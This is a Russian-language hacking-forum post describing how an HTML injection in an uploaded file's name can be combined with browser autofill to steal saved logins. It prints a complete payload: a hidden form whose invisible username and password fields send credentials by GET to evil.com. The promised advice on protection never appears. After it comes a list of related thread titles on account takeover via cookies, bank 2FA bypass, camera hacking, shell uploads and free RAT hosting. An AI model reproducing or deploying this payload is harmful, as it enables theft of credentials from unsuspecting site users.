Не предоставляй врат волшебнику: доступ к паролям через html инъекцию

BOPUEM · 1 фев 2023

ВВЕДЕНИЕ

Современные веб-сайты используют функцию автозаполнения, чтобы упростить процесс ввода данных пользователей. Но этот полезный инструмент также может быть использован для кражи учетных данных. Функция автозаполнения позволяет пользователям сохранять их учетные данные на компьютере, что открывает дверь для взлома учетных данных. В этой статье мы рассмотрим, как мы можем использовать функцию автозаполнения для кражи учетных данных и как вы можете обезопасить себя.

HTML-ИНЪЕКЦИЯ

Каждый мой ввод на неважно каком сайте был нормально выполнен приложением и поэтому мое внимание перешло на функцию загрузки файлов. Пользователи могут загружать файлы, и после загрузки сайт даёт общедоступную ссылку, которой мы можем поделиться с другими людьми, чтобы они тоже увидели этот файл. Я пытался обойти проверку на расширение файла при загрузке: я использовал .svg, .html и .php, но у меня ничего не получилось. Но как только я переименовал файл в «<h1>xd.jpg» и открыл его по общедоступной ссылке. Из-за имени файла получилась HTML-инъекция.

Итак, теперь у нас есть HTML-инъекция, теперь можно разобраться в функции автосохранения

АВТОЗАПОЛНЕНИЕ

После сохранения учетных данных для входа в наш аккаунт, при попытке снова войти на сайт, браузер автоматически заполнит поля логина и пароля, и нам просто нужно нажать на кнопку входа.

Поэтому я решил добавить стиль opaсity:0 в CSS для полей логина и пароля в форме входа, чтобы они были невидимы.

"><form action="//evil.com" method="GET"><input type="text" name="u" style='opacity:0;'><input type="password" name="p" style='opacity:0;'><input type="submit" name="s" value="submit"><!--.jpg
Нажмите, чтобы раскрыть...

Теперт я могу узнать ссылку на тот самый файл, который я загрузил.

Вот как выглядит страница, когда юзер посещает публичный URL-адрес моего загруженного файла.

при нажатии кнопки submit учетные данные для входа будут переданы на сервер.

Как выглядит действие? Функция автосохранения заполняет поля ввода автоматически, а установка стиля opacity: 0; позволит скрыть элементы, которые появляются на веб-странице. При нажатии "Отправить", данные передаются автоматически на evil.com, из-за установки METHOD='GET'. Это посылает GET-запрос на домен , содержащий учетные данные для входа. Оставшийся HTML закомментируется последними символами <!-- .

Ягода · 1 фев 2023

Такое обычно используется во всех адекватных плетежках

Всё о sql injections и no sql injections и их эксплотации

Заходим по cookie в roblox аккаунт на iphone/android

О csrf attack и важности csrf token на твоём сайте

Занимаем все места в кинотеатре без вложений

Какой обойти антифрод гугл карт?

Помощь с пентестом

История обхода 2фа на сети банков с капитализацией 50В+

Находим незапароленные дедики под свои цели

Хостим ратник бесплатно без открытия портов и хостингов

У вас остался старый тунель в playit.gg и никак не можете его удалить ? РЕШИМ

Как ****ить камеры с Dahua DVR стандартом

Обходим лаунчеры игр ( GTA , Far Cry, RDR и т.д )

Как просмотреть любое видео у любого юзера вконторы

Лутаем дополнительные ******

Обходим лаунчер Social Club в играх ( GTA IV, GTA V, RDR II и т.п)

Знакомство с веб сканером уязвимостей Nikto и эксплотация XSS

Пример эксплуатации уязвимости WebSocket (Burp Suite)

Всё о File Inclusion и Remote file inclusion

Взлом игр в Telegram.

Заливка шелла на vBulletin 5

Регистрируем Yandex аккаунт на TempMail

XSS Administrator Escalation (WP) | Повышение прав к админу | Получаем доступ без ограничений

Заходим в аккаунт через Cookie на примере Roblox

Windows Theme Spoofing CVE-2024-21320

WAF bypass. Как вызнать IP сайта, который использует WAF или защиту от DDoS

Получаем аккаунт на xaker.ru без регистрации (без подписки)

Уязвимость в ПО удаленного доступа

История о том, как я полностью взламывал wordpress сайты..

RCE с помощью загрузки плагина (CVE-2024-31210)

Обход защиты от XSS

Не предоставляй врат волшебнику: доступ к паролям через html инъекцию